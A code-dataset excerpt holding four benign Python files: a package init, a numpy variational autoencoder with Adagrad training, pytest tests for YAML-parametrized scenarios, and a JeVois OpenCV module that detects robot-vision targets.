teamgrid/envs/__init__.py
|
mila-iqia/teamgrid
|
7a6f0bf5499875a71a0e87bf5b6ce638b5587f70
|
[
"BSD-3-Clause"
] | null | null | null |
teamgrid/envs/__init__.py
|
mila-iqia/teamgrid
|
7a6f0bf5499875a71a0e87bf5b6ce638b5587f70
|
[
"BSD-3-Clause"
] | 1
|
2022-01-13T07:08:02.000Z
|
2022-01-13T07:08:02.000Z
|
from teamgrid.envs.fourrooms import *
from teamgrid.envs.switch import *
from teamgrid.envs.dualswitch import *
from teamgrid.envs.dualdoors import *
from teamgrid.envs.doorball import *
| 31.166667
| 38
| 0.812834
| 25
| 187
| 6.08
| 0.36
| 0.394737
| 0.526316
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106952
| 187
| 5
| 39
| 37.4
| 0.91018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
44ec0d88c8ce7078f663421f87772178e286ae04
| 13,458
|
py
|
Python
|
vae.py
|
anhtu/VariationalAutoEncoder
|
fc3c520f848205d229254afa78c42368c69121e9
|
[
"MIT"
] | null | null | null |
vae.py
|
anhtu/VariationalAutoEncoder
|
fc3c520f848205d229254afa78c42368c69121e9
|
[
"MIT"
] | null | null | null |
vae.py
|
anhtu/VariationalAutoEncoder
|
fc3c520f848205d229254afa78c42368c69121e9
|
[
"MIT"
] | null | null | null |
import numpy as np
from nn import *
class BerVAE:
    """Bernoulli VAE used for binary data.

    The decoder emits per-dimension Bernoulli means, so the reconstruction
    term of the ELBO is a Bernoulli negative log-likelihood.  Layers come
    from ``LayerFactory.build(activation, (n_in, n_out, dropout))`` in the
    project ``nn`` module (imported at the top of this file).
    """

    def __init__(self, params):
        """Build encoder/decoder layers from a hyper-parameter dict.

        ``params`` must provide at least: num_input, num_hidden, num_latent,
        dropout, hidden_activ, output_activ.  Every entry is copied onto the
        instance verbatim.
        """
        self.__dict__.update(**params)
        # Auto-encoder: output dimensionality mirrors the input.
        self.num_output = self.num_input
        num_input, num_hidden, dropout, num_latent, num_output = self.num_input, self.num_hidden, self.dropout, self.num_latent, self.num_output
        # encoder
        self.en_hidden = LayerFactory.build(self.hidden_activ, (num_input, num_hidden, dropout))   # W1, b1
        self.en_latent_mu = LayerFactory.build("identity", (num_hidden, num_latent, dropout))      # W2, b2
        self.en_latent_sigma = LayerFactory.build("exp", (num_hidden, num_latent, 1.))             # W3, b3
        # decoder
        self.de_hidden = LayerFactory.build(self.hidden_activ, (num_latent, num_hidden, dropout))  # W4, b4
        self.de_out_mu = LayerFactory.build(self.output_activ, (num_hidden, num_output, 1.))       # W5, b5

    def __call__(self, X_batch, epsilon=None):
        """
        Perform the forward pass

        Inputs:
        - X_batch: A numpy array of shape (num_input, mini_batch) represents the batch training data
        - epsilon: A numpy array of shape (num_latent, 1) represents a sample from Standard Normal distribution

        Returns:
        - loss: (scalar) Value of loss function
        """
        num_latent = self.num_latent
        eps = 1e-12  # numerical floor so log() stays finite
        # encoder
        h_en = self.en_hidden(X_batch)
        z_mu = self.en_latent_mu(h_en)
        z_sigma2 = self.en_latent_sigma(h_en)
        # we sample from the posterior q(z|x) via the reparameterization trick
        if epsilon is None: epsilon = np.random.normal(size=num_latent).reshape(num_latent, 1)
        z_samples = z_mu + np.sqrt(z_sigma2) * epsilon
        # decoder
        h_de = self.de_hidden(z_samples)
        x_mu = self.de_out_mu(h_de)
        # use the z_samples to estimate the ELBO
        neg_log_bernoulli = lambda x, p: -x*np.log(p + eps) - (1. - x)*np.log(1. - p + eps)
        neg_kl_divergence = 0.5*(-1. - np.log(z_sigma2) + z_mu**2 + z_sigma2)
        # minimize this loss instead of maximizing the ELBO
        loss = neg_kl_divergence.sum() + neg_log_bernoulli(X_batch, x_mu).sum()
        # cache intermediates for back_prop()
        self.h_en, self.z_mu, self.z_sigma2, self.epsilon, self.z_samples = h_en, z_mu, z_sigma2, epsilon, z_samples
        self.h_de, self.x_mu, self.X_batch = h_de, x_mu, X_batch
        return loss

    def generate_data(self, samples=None):
        """Decode latent ``samples`` (or a fresh draw from the prior) into
        Bernoulli means of shape (num_output, 1)."""
        # sample from the prior when no latent vector is supplied
        z_samples = np.random.normal(size=self.num_latent).reshape(self.num_latent, 1) if samples is None else samples
        # forward to the output (predict = no dropout)
        h_de = self.de_hidden.predict(z_samples)
        x_mu = self.de_out_mu.predict(h_de)
        return x_mu

    def back_prop(self):
        """Backpropagate the loss cached by the last forward pass.

        Returns gradients (dW5, db5, dW4, db4, dW3, db3, dW2, db2, dW1, db1)
        in decoder-to-encoder order, matching the unpacking in train().
        """
        eps = 1e-12
        h_en, z_mu, z_sigma2, epsilon, z_samples = self.h_en, self.z_mu, self.z_sigma2, self.epsilon, self.z_samples
        h_de, x_mu, X_batch = self.h_de, self.x_mu, self.X_batch
        # d(neg log Bernoulli)/d(x_mu)
        dloss_dxm = -X_batch/(x_mu + eps) + (1. - X_batch)/(1. - x_mu + eps)
        dloss_dhde, dloss_dW5, dloss_db5 = self.de_out_mu.back_prop(dloss_dxm)
        dloss_dz_samples, dloss_dW4, dloss_db4 = self.de_hidden.back_prop(dloss_dhde)
        # KL-term gradients w.r.t. z_mu and z_sigma2
        dloss_dzm1 = z_mu
        dloss_dzs1 = -0.5/z_sigma2 + 0.5
        # reconstruction gradients propagated through the reparameterization
        dz_samples_dzm2 = 1.
        dz_samples_dzs2 = 0.5*epsilon * (z_sigma2)**-0.5
        dloss_dzm2 = dloss_dz_samples * dz_samples_dzm2
        dloss_dzs2 = dloss_dz_samples * dz_samples_dzs2
        dloss_dzm = dloss_dzm1 + dloss_dzm2
        dloss_dzs = dloss_dzs1 + dloss_dzs2
        dloss_dhen1, dloss_dW2, dloss_db2 = self.en_latent_mu.back_prop(dloss_dzm)
        dloss_dhen2, dloss_dW3, dloss_db3 = self.en_latent_sigma.back_prop(dloss_dzs)
        dloss_dhen = dloss_dhen1 + dloss_dhen2
        _, dloss_dW1, dloss_db1 = self.en_hidden.back_prop(dloss_dhen)
        return dloss_dW5, dloss_db5, dloss_dW4, dloss_db4, dloss_dW3, dloss_db3, dloss_dW2, dloss_db2, dloss_dW1, dloss_db1

    def train(self, X, batch_size=100, num_iter=1000, step_size=0.001, print_every=100):
        """
        Perform training procedure using Adagrad
        """
        # Bind layer parameters locally; the in-place "-=" updates below
        # mutate the numpy arrays the layers hold.
        W5, b5, W4, b4 = self.de_out_mu.W, self.de_out_mu.b, self.de_hidden.W, self.de_hidden.b
        W3, b3, W2, b2, W1, b1 = self.en_latent_sigma.W, self.en_latent_sigma.b, self.en_latent_mu.W, self.en_latent_mu.b, self.en_hidden.W, self.en_hidden.b
        eps = 1e-12
        num_train = X.shape[1]
        cache = {"W5": 0., "W4": 0., "W3": 0., "W2": 0., "W1": 0., "b5": 0., "b4": 0., "b3": 0., "b2": 0., "b1": 0.}
        for i in range(num_iter+1):
            # create mini-batch without replacement
            ix_batch = np.random.choice(range(num_train), size=batch_size, replace=False)
            X_batch = X[:, ix_batch]
            loss = self.__call__(X_batch)
            dW5, db5, dW4, db4, dW3, db3, dW2, db2, dW1, db1 = self.back_prop()
            # Adagrad: accumulate squared gradients per parameter
            cache["W5"] += dW5**2
            cache["W4"] += dW4**2
            cache["W3"] += dW3**2
            cache["W2"] += dW2**2
            cache["W1"] += dW1**2
            cache["b5"] += db5**2
            cache["b4"] += db4**2
            cache["b3"] += db3**2
            cache["b2"] += db2**2
            cache["b1"] += db1**2
            def ratio_weight_update(dW, W, W_name):
                # diagnostic: magnitude of the step relative to the weights
                param_scale = np.linalg.norm(W.ravel())
                update = step_size * dW / (np.sqrt(cache[W_name]) + eps)
                update_scale = np.linalg.norm(update.ravel())
                return update_scale / param_scale
            ratio_W1 = ratio_weight_update(dW1, W1, "W1")
            W5 -= step_size * dW5 / (np.sqrt(cache["W5"]) + eps)
            W4 -= step_size * dW4 / (np.sqrt(cache["W4"]) + eps)
            W3 -= step_size * dW3 / (np.sqrt(cache["W3"]) + eps)
            W2 -= step_size * dW2 / (np.sqrt(cache["W2"]) + eps)
            W1 -= step_size * dW1 / (np.sqrt(cache["W1"]) + eps)
            b5 -= step_size * db5 / (np.sqrt(cache["b5"]) + eps)
            b4 -= step_size * db4 / (np.sqrt(cache["b4"]) + eps)
            b3 -= step_size * db3 / (np.sqrt(cache["b3"]) + eps)
            b2 -= step_size * db2 / (np.sqrt(cache["b2"]) + eps)
            b1 -= step_size * db1 / (np.sqrt(cache["b1"]) + eps)
            if i % print_every == 0:
                print("Iter: " + str(i) + " - Mini batch loss: " + str(loss))
                print("Ratio upd W1: " + str(ratio_W1))

    def save_model(self, pk_file):
        """Pickle the hyper-parameters and every layer's W/b to ``pk_file``."""
        # BUG FIX: `pk` was referenced but never imported in this module
        # (only numpy and nn are imported at the top of the file).
        import pickle as pk
        self.saved_attr = ["num_input", "num_latent", "num_output", "dropout"]
        self.layers = ["en_hidden", "en_latent_mu", "en_latent_sigma", "de_hidden", "de_out_mu"]
        saved_data = {}
        for attr in self.saved_attr:
            saved_data[attr] = self.__dict__[attr]
        for layer_name in self.layers:
            # BUG FIX: the original looked up self.__dict__[attr] — the last
            # hyper-parameter name from the loop above — so every "layer"
            # saved was the same wrong object instead of the named layer.
            layer = self.__dict__[layer_name]
            saved_data[layer_name + "_W"] = layer.W
            saved_data[layer_name + "_b"] = layer.b
        with open(pk_file, 'wb') as f:
            pk.dump(saved_data, f, pk.HIGHEST_PROTOCOL)
class GauVAE:
    """Gaussian VAE used for real-valued data.

    The decoder emits a per-dimension Gaussian mean and variance, so the
    reconstruction term of the ELBO is a Gaussian negative log-likelihood.
    Layers come from ``LayerFactory.build(activation, (n_in, n_out, dropout))``
    in the project ``nn`` module (imported at the top of this file).
    """

    def __init__(self, params):
        """Build encoder/decoder layers from a hyper-parameter dict.

        ``params`` must provide at least: num_input, num_hidden, num_latent,
        dropout, hidden_activ.  Every entry is copied onto the instance.
        """
        self.__dict__.update(**params)
        # Auto-encoder: output dimensionality mirrors the input.
        self.num_output = self.num_input
        num_input, num_hidden, dropout, num_latent = self.num_input, self.num_hidden, self.dropout, self.num_latent
        # BUG FIX: the original passed layer sizes as separate positional
        # arguments while BerVAE passes one (n_in, n_out, dropout) tuple, and
        # it sized the encoder hidden layer with the undefined local
        # `num_output` instead of `num_hidden` (NameError at construction).
        # encoder
        self.en_hidden = LayerFactory.build(self.hidden_activ, (num_input, num_hidden, dropout))    # W1, b1
        self.en_latent_mu = LayerFactory.build("identity", (num_hidden, num_latent, dropout))       # W2, b2
        self.en_latent_sigma = LayerFactory.build("exp", (num_hidden, num_latent, 1.))              # W3, b3
        # decoder
        self.de_hidden = LayerFactory.build(self.hidden_activ, (num_latent, num_hidden, dropout))   # W4, b4
        self.de_out_mu = LayerFactory.build("identity", (num_hidden, self.num_output, dropout))     # W5, b5
        self.de_out_sigma = LayerFactory.build("exp", (num_hidden, self.num_output, 1.))            # W6, b6

    def __call__(self, X_batch, epsilon=None):
        """
        Perform the forward pass

        Inputs:
        - X_batch: A numpy array of shape (num_input, mini_batch) represents the batch training data
        - epsilon: A numpy array of shape (num_latent, 1) represents a sample from Standard Normal distribution

        Returns:
        - loss: (scalar) Value of loss function
        """
        num_latent = self.num_latent
        eps = 1e-12  # numerical floor so log() stays finite
        # encoder
        h_en = self.en_hidden(X_batch)
        z_mu = self.en_latent_mu(h_en)
        z_sigma2 = self.en_latent_sigma(h_en)
        # we sample from the posterior q(z|x) via the reparameterization trick
        if epsilon is None: epsilon = np.random.normal(size=num_latent).reshape(num_latent, 1)
        z_samples = z_mu + np.sqrt(z_sigma2) * epsilon
        # decoder
        h_de = self.de_hidden(z_samples)
        x_mu = self.de_out_mu(h_de)
        x_sigma2 = self.de_out_sigma(h_de)
        # use the z_samples to estimate the ELBO
        neg_log_gaussian = lambda x, m, s2: 0.5*np.log(2.*np.pi*s2) + (x - m)**2 / (2.*s2)
        neg_kl_divergence = 0.5*(-1. - np.log(z_sigma2) + z_mu**2 + z_sigma2)
        # minimize this loss instead of maximizing the ELBO
        loss = neg_kl_divergence.sum() + neg_log_gaussian(X_batch, x_mu, x_sigma2).sum()
        # cache intermediates for back_prop()
        self.h_en, self.z_mu, self.z_sigma2, self.epsilon, self.z_samples = h_en, z_mu, z_sigma2, epsilon, z_samples
        self.h_de, self.x_mu, self.x_sigma2, self.X_batch = h_de, x_mu, x_sigma2, X_batch
        return loss

    def generate_data(self, samples=None):
        """Decode latent ``samples`` (or a fresh draw from the prior) into
        Gaussian means of shape (num_output, 1); the variance head is unused."""
        # sample from the prior when no latent vector is supplied
        z_samples = np.random.normal(size=self.num_latent).reshape(self.num_latent, 1) if samples is None else samples
        # forward to the output (predict = no dropout)
        h_de = self.de_hidden.predict(z_samples)
        x_mu = self.de_out_mu.predict(h_de)
        return x_mu

    def back_prop(self):
        """Backpropagate the loss cached by the last forward pass.

        Returns gradients (dW6, db6, dW5, db5, dW4, db4, dW3, db3, dW2, db2,
        dW1, db1) in decoder-to-encoder order, matching train().
        """
        eps = 1e-12
        h_en, z_mu, z_sigma2, epsilon, z_samples = self.h_en, self.z_mu, self.z_sigma2, self.epsilon, self.z_samples
        h_de, x_mu, x_sigma2, X_batch = self.h_de, self.x_mu, self.x_sigma2, self.X_batch
        # d(neg log Gaussian)/d(x_mu) and /d(x_sigma2)
        dloss_dxm = (x_mu - X_batch) / x_sigma2
        dloss_dxs = 0.5/x_sigma2 - 0.5*(X_batch - x_mu)**2 / x_sigma2**2
        dloss_dhde1, dloss_dW5, dloss_db5 = self.de_out_mu.back_prop(dloss_dxm)
        dloss_dhde2, dloss_dW6, dloss_db6 = self.de_out_sigma.back_prop(dloss_dxs)
        dloss_dhde = dloss_dhde1 + dloss_dhde2
        dloss_dz_samples, dloss_dW4, dloss_db4 = self.de_hidden.back_prop(dloss_dhde)
        # KL-term gradients w.r.t. z_mu and z_sigma2
        dloss_dzm1 = z_mu
        dloss_dzs1 = -0.5/z_sigma2 + 0.5
        # reconstruction gradients propagated through the reparameterization
        dz_samples_dzm2 = 1.
        dz_samples_dzs2 = 0.5*epsilon * (z_sigma2)**-0.5
        dloss_dzm2 = dloss_dz_samples * dz_samples_dzm2
        dloss_dzs2 = dloss_dz_samples * dz_samples_dzs2
        dloss_dzm = dloss_dzm1 + dloss_dzm2
        dloss_dzs = dloss_dzs1 + dloss_dzs2
        dloss_dhen1, dloss_dW2, dloss_db2 = self.en_latent_mu.back_prop(dloss_dzm)
        dloss_dhen2, dloss_dW3, dloss_db3 = self.en_latent_sigma.back_prop(dloss_dzs)
        dloss_dhen = dloss_dhen1 + dloss_dhen2
        _, dloss_dW1, dloss_db1 = self.en_hidden.back_prop(dloss_dhen)
        return dloss_dW6, dloss_db6, dloss_dW5, dloss_db5, dloss_dW4, dloss_db4, dloss_dW3, dloss_db3, dloss_dW2, dloss_db2, dloss_dW1, dloss_db1

    def train(self, X, batch_size=100, num_iter=1000, step_size=0.001, print_every=100):
        """
        Perform training procedure using Adagrad
        """
        # Bind layer parameters locally; the in-place "-=" updates below
        # mutate the numpy arrays the layers hold.
        W6, b6, W5, b5, W4, b4 = self.de_out_sigma.W, self.de_out_sigma.b, self.de_out_mu.W, self.de_out_mu.b, self.de_hidden.W, self.de_hidden.b
        W3, b3, W2, b2, W1, b1 = self.en_latent_sigma.W, self.en_latent_sigma.b, self.en_latent_mu.W, self.en_latent_mu.b, self.en_hidden.W, self.en_hidden.b
        eps = 1e-12
        num_train = X.shape[1]
        cache = {"W6": 0., "b6": 0., "W5": 0., "W4": 0., "W3": 0., "W2": 0., "W1": 0., "b5": 0., "b4": 0., "b3": 0., "b2": 0., "b1": 0.}
        for i in range(num_iter+1):
            # create mini-batch without replacement
            ix_batch = np.random.choice(range(num_train), size=batch_size, replace=False)
            X_batch = X[:, ix_batch]
            loss = self.__call__(X_batch)
            dW6, db6, dW5, db5, dW4, db4, dW3, db3, dW2, db2, dW1, db1 = self.back_prop()
            # Adagrad: accumulate squared gradients per parameter
            cache["W6"] += dW6**2
            cache["W5"] += dW5**2
            cache["W4"] += dW4**2
            cache["W3"] += dW3**2
            cache["W2"] += dW2**2
            cache["W1"] += dW1**2
            cache["b6"] += db6**2
            cache["b5"] += db5**2
            cache["b4"] += db4**2
            cache["b3"] += db3**2
            cache["b2"] += db2**2
            cache["b1"] += db1**2
            W6 -= step_size * dW6 / (np.sqrt(cache["W6"]) + eps)
            W5 -= step_size * dW5 / (np.sqrt(cache["W5"]) + eps)
            W4 -= step_size * dW4 / (np.sqrt(cache["W4"]) + eps)
            W3 -= step_size * dW3 / (np.sqrt(cache["W3"]) + eps)
            W2 -= step_size * dW2 / (np.sqrt(cache["W2"]) + eps)
            W1 -= step_size * dW1 / (np.sqrt(cache["W1"]) + eps)
            b6 -= step_size * db6 / (np.sqrt(cache["b6"]) + eps)
            b5 -= step_size * db5 / (np.sqrt(cache["b5"]) + eps)
            b4 -= step_size * db4 / (np.sqrt(cache["b4"]) + eps)
            b3 -= step_size * db3 / (np.sqrt(cache["b3"]) + eps)
            b2 -= step_size * db2 / (np.sqrt(cache["b2"]) + eps)
            b1 -= step_size * db1 / (np.sqrt(cache["b1"]) + eps)
            if i % print_every == 0:
                print("Iter: " + str(i) + " - Mini batch loss: " + str(loss))

    def save_model(self, pk_file):
        """Pickle the hyper-parameters and every layer's W/b to ``pk_file``."""
        # BUG FIX: `pk` was referenced but never imported in this module
        # (only numpy and nn are imported at the top of the file).
        import pickle as pk
        self.saved_attr = ["num_input", "num_latent", "num_output", "dropout"]
        self.layers = ["en_hidden", "en_latent_mu", "en_latent_sigma", "de_hidden", "de_out_mu", "de_out_sigma"]
        saved_data = {}
        for attr in self.saved_attr:
            saved_data[attr] = self.__dict__[attr]
        for layer_name in self.layers:
            # BUG FIX: the original looked up self.__dict__[attr] — the last
            # hyper-parameter name from the loop above — so every "layer"
            # saved was the same wrong object instead of the named layer.
            layer = self.__dict__[layer_name]
            saved_data[layer_name + "_W"] = layer.W
            saved_data[layer_name + "_b"] = layer.b
        with open(pk_file, 'wb') as f:
            pk.dump(saved_data, f, pk.HIGHEST_PROTOCOL)
# [TODO] restore model
| 39.816568
| 153
| 0.646084
| 2,203
| 13,458
| 3.667726
| 0.095325
| 0.022277
| 0.031312
| 0.016337
| 0.89505
| 0.889975
| 0.881436
| 0.878342
| 0.875248
| 0.87401
| 0
| 0.043851
| 0.212067
| 13,458
| 337
| 154
| 39.934718
| 0.718125
| 0.110418
| 0
| 0.729858
| 0
| 0
| 0.036987
| 0
| 0
| 0
| 0
| 0.002967
| 0
| 1
| 0.061611
| false
| 0
| 0.009479
| 0
| 0.113744
| 0.028436
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7839ac281a99d02e6d931cb377eb81f5b2103526
| 2,654
|
py
|
Python
|
tests/test_parametrized.py
|
VeerendraNathLukkani/pytest_test
|
c39a1a7e74d90aebeb30797a61d0e491942557e8
|
[
"Apache-2.0"
] | 51
|
2018-04-26T09:02:38.000Z
|
2021-11-21T10:57:32.000Z
|
tests/test_parametrized.py
|
VeerendraNathLukkani/pytest_test
|
c39a1a7e74d90aebeb30797a61d0e491942557e8
|
[
"Apache-2.0"
] | 39
|
2017-12-20T14:27:33.000Z
|
2018-04-05T22:45:12.000Z
|
tests/test_parametrized.py
|
tierratelematics/pytest-play
|
c39a1a7e74d90aebeb30797a61d0e491942557e8
|
[
"Apache-2.0"
] | 5
|
2018-06-30T15:51:39.000Z
|
2020-04-13T19:31:25.000Z
|
def test_autoexecute_yml_parametrized_data(testdir):
    """Two test_data rows parametrize the scenario into two passing tests."""
    scenario = testdir.makefile(".yml", """
        ---
        test_data:
            - username: foo
              age: 21
            - username: bar
              age: 22
        ---
        - provider: python
          type: assert
          expression: variables['username'] in ('foo', 'bar',)
    """)
    name = scenario.basename
    assert name.startswith('test_')
    assert name.endswith('.yml')
    run = testdir.runpytest()
    run.assert_outcomes(passed=2)
def test_autoexecute_yml_parametrized_data_uppercase(testdir):
    """Mixed-case variable names must round-trip through parametrization."""
    scenario = testdir.makefile(".yml", """
        ---
        test_data:
            - Username: Foo
            - Username: Bar
        ---
        - provider: python
          type: assert
          expression: variables['Username'] in ('Foo', 'Bar',)
    """)
    name = scenario.basename
    assert name.startswith('test_')
    assert name.endswith('.yml')
    run = testdir.runpytest()
    run.assert_outcomes(passed=2)
def test_autoexecute_yml_parametrized_data_json(testdir):
    """test_data given in JSON (flow) syntax behaves like block YAML."""
    scenario = testdir.makefile(".yml", """
        ---
        test_data:
            [{"username": "foo"},
             {"username": "bar"}]
        ---
        - provider: python
          type: assert
          expression: variables['username'] in ('foo', 'bar',)
    """)
    name = scenario.basename
    assert name.startswith('test_')
    assert name.endswith('.yml')
    run = testdir.runpytest()
    run.assert_outcomes(passed=2)
def test_autoexecute_yml_parametrized_data_passed_failed(testdir):
    """One matching and one non-matching row -> one pass, one failure."""
    scenario = testdir.makefile(".yml", """
        ---
        test_data:
            - username: foo
            - username: barZ
        ---
        - provider: python
          type: assert
          expression: variables['username'] in ('foo', 'bar',)
    """)
    name = scenario.basename
    assert name.startswith('test_')
    assert name.endswith('.yml')
    run = testdir.runpytest()
    run.assert_outcomes(passed=1, failed=1)
def test_autoexecute_yml_parametrized_data_passed_keyword(testdir):
    """-k selection runs only the chosen parametrized case (the passing one)."""
    scenario = testdir.makefile(".yml", """
        ---
        test_data:
            - username: foo
            - username: barZ
        ---
        - provider: python
          type: assert
          expression: variables['username'] in ('foo', 'bar',)
    """)
    name = scenario.basename
    assert name.startswith('test_')
    assert name.endswith('.yml')
    run = testdir.runpytest('-k test_data0')
    run.assert_outcomes(passed=1, failed=0)
def test_autoexecute_yml_parametrized_data_a(testdir):
    """Non-ASCII values in test_data must survive parametrization."""
    scenario = testdir.makefile(".yml", """
        ---
        test_data:
            - username: foò
            - username: bàr
        ---
        - provider: python
          type: assert
          expression: variables['username'] in ('foò', 'bàr',)
    """)
    name = scenario.basename
    assert name.startswith('test_')
    assert name.endswith('.yml')
    run = testdir.runpytest()
    run.assert_outcomes(passed=2)
| 22.87931
| 67
| 0.677091
| 308
| 2,654
| 5.613636
| 0.13961
| 0.072874
| 0.090226
| 0.145749
| 0.943898
| 0.943898
| 0.877964
| 0.849624
| 0.818971
| 0.791209
| 0
| 0.005869
| 0.165411
| 2,654
| 115
| 68
| 23.078261
| 0.774718
| 0.004145
| 0
| 0.782609
| 0
| 0
| 0.387856
| 0.047818
| 0
| 0
| 0
| 0
| 0.26087
| 1
| 0.065217
| false
| 0.086957
| 0
| 0
| 0.065217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
78540be42820e6505d9d5e688146afb6ea40ae28
| 7,698
|
py
|
Python
|
src/vision/ShockVision.py
|
shockwave4488/FRC-2019-Public
|
174ac97c000d915ed96ec839efb480c0ab1f11e0
|
[
"MIT"
] | null | null | null |
src/vision/ShockVision.py
|
shockwave4488/FRC-2019-Public
|
174ac97c000d915ed96ec839efb480c0ab1f11e0
|
[
"MIT"
] | null | null | null |
src/vision/ShockVision.py
|
shockwave4488/FRC-2019-Public
|
174ac97c000d915ed96ec839efb480c0ab1f11e0
|
[
"MIT"
] | null | null | null |
import libjevois as jevois
import cv2
import numpy as np
class ShockVision:
    """JeVois module that locates paired retro-reflective vision targets.

    Bright-colored pixels are masked in HSV space, their contours classified
    as left- or right-tilted target strips, the largest detection paired with
    its nearest opposite, and the pair's average position reported over
    serial.  ``process`` additionally annotates and streams the frame over
    USB; ``processNoUSB`` only reports (with coordinates rounded to ints).

    This refactor deduplicates the formerly copy-pasted bodies of ``process``
    and ``processNoUSB`` into ``_find_targets`` / ``_select_pair`` while
    preserving their observable behavior, including quirks noted below.
    """

    def getCenterX(goodContour):
        # Sort key for detection entries: [contour, centerX, centerY, area, isLeft].
        # Deliberately no ``self``: it is always invoked via the class object.
        return goodContour[1]

    def _find_targets(self, img, draw):
        """Color-filter ``img`` and classify candidate target contours.

        Returns ``(img, goodContours, area)``: ``goodContours`` holds
        ``[contour, centerX, centerY, area, isLeft]`` entries, and ``area`` is
        the area of the *last* contour examined — a quirk of the original
        code, whose serial messages reported that value rather than the
        paired targets' area.  When ``draw`` is true, accepted boxes are
        drawn onto the returned (color-filtered) image.
        """
        hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
        # NOTE(review): the original built two *identical* inRange masks and
        # OR-ed them, then used only one; the redundant mask was dead code
        # and is removed here.
        upperMask = cv2.inRange(hsv, np.array([60, 120, 240]), np.array([100, 255, 255]))
        colorFiltered = cv2.bitwise_and(img, img, mask=upperMask)
        img = colorFiltered
        contours, _hierarchy = cv2.findContours(cv2.split(colorFiltered)[2], cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
        goodContours = list()
        area = 0  # survives the loop: last contour's area (see docstring)
        for contour in contours:
            hull = cv2.convexHull(contour, False)
            perimeter = cv2.arcLength(hull, True)
            rect = cv2.minAreaRect(hull)
            angle = rect[2]
            width, height = rect[1]
            area = width * height
            apRatio = 0
            if area > 0 and perimeter > 0:
                # area / perimeter^2: scale-invariant compactness descriptor.
                apRatio = area / perimeter ** 2
            if width == 0 or height == 0:
                continue
            centerX, centerY = rect[0]
            ratio = width / height
            # Narrow, near-upright box => right-hand target strip (isLeft=False).
            if (ratio > 0.2 and ratio < 0.8) and (angle > -30 and angle < 10 and apRatio > 0.045 and apRatio < 0.08):
                if draw:
                    box = np.int0(cv2.boxPoints(rect))
                    img = cv2.drawContours(img, [box], 0, (0, 0, 255), 3)
                goodContours.append([contour, centerX, centerY, area, False])
            # Wide, strongly tilted box => left-hand target strip (isLeft=True).
            if (ratio > 1 and ratio < 4) and (angle > -90 and angle < -50 and apRatio > 0.045 and apRatio < 0.08):
                if draw:
                    box = np.int0(cv2.boxPoints(rect))
                    img = cv2.drawContours(img, [box], 0, (255, 0, 0), 3)
                goodContours.append([contour, centerX, centerY, area, True])
        return img, goodContours, area

    def _select_pair(self, goodContours):
        """Sort detections left-to-right (in place) and pair the largest one.

        Returns ``[]`` when there are no detections, otherwise the 1- or
        2-element list produced by ``pairRect``.
        """
        goodContours.sort(key=ShockVision.getCenterX)
        if not goodContours:
            return []
        largest = goodContours[0]
        for entry in goodContours:
            if entry[3] > largest[3]:
                largest = entry
        return self.pairRect(goodContours, largest)

    def process(self, inframe, outframe):
        """Detect targets, annotate the frame, report over serial, stream USB."""
        img = inframe.getCvBGR()
        img, goodContours, area = self._find_targets(img, True)
        pair = self._select_pair(goodContours)
        if pair:
            img = cv2.drawContours(img, pair[0], 0, (150, 100, 150), 3)
            if len(pair) == 2:
                img = cv2.drawContours(img, pair[1], 0, (150, 100, 150), 3)
            avgX = (pair[0][1] + pair[1][1] if len(pair) == 2 else pair[0][1]) / len(pair)
            avgY = (pair[0][2] + pair[1][2] if len(pair) == 2 else pair[0][2]) / len(pair)
            # "B" = both strips found; otherwise report which side we saw.
            side = "B" if len(pair) == 2 else ("L" if pair[0][4] else "R")
            # Raw float coordinates here; processNoUSB rounds (original asymmetry).
            jevois.sendSerial("&" + str(avgX) + "," + str(avgY) + "," + side + "," + str(area) + "," + "top")
        else:
            jevois.sendSerial("&None" + "," + "top")
        outframe.sendCv(img)

    def processNoUSB(self, inframe):
        """Headless variant of ``process``: serial report only, no drawing/USB."""
        img = inframe.getCvBGR()
        img, goodContours, area = self._find_targets(img, False)
        pair = self._select_pair(goodContours)
        if pair:
            avgX = (pair[0][1] + pair[1][1] if len(pair) == 2 else pair[0][1]) / len(pair)
            avgY = (pair[0][2] + pair[1][2] if len(pair) == 2 else pair[0][2]) / len(pair)
            side = "B" if len(pair) == 2 else ("L" if pair[0][4] else "R")
            jevois.sendSerial("&" + str(int(round(avgX))) + "," + str(int(round(avgY))) + "," + side + "," + str(int(round(area))) + "," + "top")
        else:
            jevois.sendSerial("&None" + "," + "top")

    def pairRect(self, goodContours, largest):
        """Find the nearest opposite-handed detection for ``largest``.

        For a left strip (``largest[4]`` true) the partner is the closest
        right strip with a larger centerX; for a right strip, the closest
        left strip with a smaller centerX.  Returns ``[largest]`` when no
        partner exists, else ``[largest, partner]``.
        """
        closestOpposite = None
        for contour in goodContours:
            if contour[4] == largest[4]:
                continue
            if largest[4]:
                if closestOpposite is None:
                    if contour[1] > largest[1]:
                        closestOpposite = contour
                elif contour[1] < closestOpposite[1] and contour[1] > largest[1]:
                    closestOpposite = contour
            else:
                if closestOpposite is None:
                    if contour[1] < largest[1]:
                        closestOpposite = contour
                elif contour[1] > closestOpposite[1] and contour[1] < largest[1]:
                    closestOpposite = contour
        if closestOpposite is None:
            return list([largest])
        return list([largest, closestOpposite])
| 47.226994
| 309
| 0.511432
| 850
| 7,698
| 4.615294
| 0.141176
| 0.026765
